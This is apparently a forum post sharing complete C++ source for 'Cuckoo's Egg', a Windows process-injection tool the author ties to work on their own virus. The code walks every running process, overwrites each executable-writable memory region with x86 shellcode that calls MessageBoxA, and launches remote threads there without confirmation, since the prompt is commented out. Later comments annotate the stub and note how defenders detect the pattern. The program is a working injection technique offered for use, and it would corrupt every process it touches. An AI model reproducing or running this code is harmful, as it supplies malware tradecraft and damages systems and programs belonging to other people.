
Cuckoo's Egg (proc injection)


JMC31337


Called it cuckoo's egg because a cuckoo is a parasite that lays its eggs in other birds' nests :dunno:

(got started on this idea in order to self delete my virus)

searches through all processes and injects a remote thread that spawns a message box in every memory region with RWX protection

combined and modified code from rwx-hunter.cpp and https://www.cnblogs.com/LyShark/p/13707084.html

 

#include <windows.h>
#include <iostream>
#include <psapi.h>
#include <TlHelp32.h>
#include <stdio.h>
#include <conio.h>


// 16-byte x86 stub that ScanProcs copies to the start of every matching region
// of a target process. Because it is written as a string literal,
// sizeof(shell2) is 17: the 16 opcode bytes plus the terminating NUL, and all
// 17 are written by WriteProcessMemory.
unsigned char shell2[] = "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\xB9\xFF\xFF\xFF\xFF\xFF\xD1\xC3";
  // Byte layout:
  //  0: 6A 00            push 0
  //  2: 6A 00            push 0
  //  4: 6A 00            push 0
  //  6: 6A 00            push 0        -- four zero arguments for MessageBoxA
  //  8: B9 FF FF FF FF   mov ecx, imm32 -- the imm32 at offset 9 is a placeholder;
  //                      main() overwrites it with the address of MessageBoxA
  //                      before any injection happens
  // 13: FF D1            call ecx
  // 15: C3               ret
  // No pusha/popa (0x60/0x61) is present in these bytes, so the stub does not
  // preserve the registers of the thread it runs on. Nothing pops the pushed
  // arguments; the stub relies on MessageBoxA being __stdcall (callee cleans up).
  
  
  
  
// Walk the whole user address range of hProc one VirtualQueryEx region at a
// time and, for each region whose protection is PAGE_EXECUTE_READWRITE or
// PAGE_EXECUTE_WRITECOPY, overwrite the start of the region with shell2 and
// start a remote thread at the region base.
// hProc: handle to the target process; main opens it with PROCESS_ALL_ACCESS.
//        It is not closed here.
// Every Win32 return value in this function is ignored, so failures are silent.
// Defender note: cross-process WriteProcessMemory immediately followed by
// CreateRemoteThread is the textbook remote-thread injection pattern; it is
// what Sysmon event 8 (CreateRemoteThread) and equivalent EDR telemetry record,
// and the per-region repetition makes this variant especially noisy.
VOID ScanProcs(HANDLE hProc)
{

	SIZE_T stSize = 0;                       // bytes VirtualQueryEx filled in; 0 means the query failed
	PBYTE pAdd = (PBYTE)0;                   // cursor through the target's address space
	SYSTEM_INFO si;
	MEMORY_BASIC_INFORMATION mbi = { 0 };
	ZeroMemory(&si,sizeof(SYSTEM_INFO));
	GetSystemInfo(&si);                      // only dwPageSize and the min/max application address are used
	pAdd = (PBYTE)si.lpMinimumApplicationAddress;
	
	printf("-----------------------------------------\n");
	
	// One VirtualQueryEx per region until the cursor passes the top of user space.
	while (pAdd < (PBYTE)si.lpMaximumApplicationAddress)
	{
		ZeroMemory(&mbi,sizeof(MEMORY_BASIC_INFORMATION));
		stSize = VirtualQueryEx(hProc, pAdd, &mbi, sizeof(MEMORY_BASIC_INFORMATION));
	
		// Query failed: skip one page and keep scanning rather than abort.
		if (stSize == 0)
		{
			pAdd += si.dwPageSize;
			continue;
		}
		
		// Only mbi.Protect is consulted; mbi.State (commit/reserve/free) is never checked.
		if (mbi.Protect & PAGE_EXECUTE_READWRITE)
		{
			// NOTE(review): %08X with a pointer argument is a format/argument
			// mismatch; it only happens to print the address on a 32-bit build.
			printf("BaseAddress:0x%08X \t\n", mbi.BaseAddress);
			printf("RWE!!!!\n");
			// Writes all sizeof(shell2) bytes (including the literal's NUL) over
			// the first bytes of the region, whatever lived there. Result unchecked.
			WriteProcessMemory(hProc, mbi.BaseAddress, shell2, sizeof(shell2), NULL);
			// Thread starts at the region base, which is also passed as its
			// parameter. The returned thread handle is never closed (leaks one
			// handle per region).
			CreateRemoteThread(hProc,NULL,NULL,(LPTHREAD_START_ROUTINE)mbi.BaseAddress,mbi.BaseAddress,NULL,NULL);
		}
		
		// Same treatment for copy-on-write executable regions.
		if (mbi.Protect & PAGE_EXECUTE_WRITECOPY)
		{
			printf("BaseAddress:0x%08X \t\n", mbi.BaseAddress);
			printf("EWCOPY!!!!\n");
			WriteProcessMemory(hProc, mbi.BaseAddress, shell2, sizeof(shell2), NULL);
			CreateRemoteThread(hProc, NULL, NULL,(LPTHREAD_START_ROUTINE)mbi.BaseAddress,mbi.BaseAddress,NULL,NULL);
		}
		
		// Advance to the first byte after this region.
		pAdd = (PBYTE)mbi.BaseAddress + mbi.RegionSize;
	}
}



// Entry point (32-bit x86 / MSVC only: pointers are truncated to DWORD and the
// inline _asm block uses MSVC x86 syntax).
// 1. Resolves MessageBoxA and stores its address into shell2 at offset 9, the
//    imm32 operand of the stub's mov ecx.
// 2. Walks a Toolhelp snapshot of all processes and hands every process it can
//    open with PROCESS_ALL_ACCESS to ScanProcs without confirmation -- the
//    "Run it?" prompt is printed, but the keypress check below is commented out.
// Neither the snapshot handle nor any process handle is closed before return.
int main()
{
	getchar();                               // block on stdin before doing anything

	// Neither result is checked; a NULL here would be patched into the stub as-is.
	HMODULE user32 = LoadLibraryA("user32.dll");
	VOID* mbox = GetProcAddress(user32, "MessageBoxA");
	DWORD x = (DWORD)mbox;                   // pointer -> 32-bit value for the asm block
	DWORD y = (DWORD)shell2;

	// Store x at shell2 + 9, i.e. over the FF FF FF FF placeholder that follows
	// the B9 (mov ecx, imm32) opcode. pusha/popa preserve the registers used.
	_asm
	{
	
		//int 3
		pusha
		mov eax,x
		mov ecx,y 
		add ecx,0x09
		mov [ecx],eax
		popa
	
	}

	printf("add:%x",(DWORD)mbox);            // echo the resolved address
	//getchar();

	HANDLE hProc;
	// Snapshot return value is not checked, and snap is never closed.
	HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
	PROCESSENTRY32 pe32 = {};
	pe32.dwSize = sizeof(PROCESSENTRY32);    // must be set before Process32First
	DWORD bw = 0;                            // unused
	Process32First(snap,&pe32);              // this first entry is consumed but never scanned (loop below starts with Next)

	while (Process32Next(snap,&pe32))
	{
		
		// Processes that refuse PROCESS_ALL_ACCESS are skipped silently.
		hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
		if (hProc)
		{

			std::wcout << pe32.szExeFile << " Run it? \n";

			// Confirmation is commented out, so every openable process is scanned.
			//int i = _getch();
			//if (i == '1')
			//{
				ScanProcs(hProc);
				//getchar();
			//}
		
			// hProc is not closed here (leaks one handle per process).
		}
	
	}
	return 0;

}

 
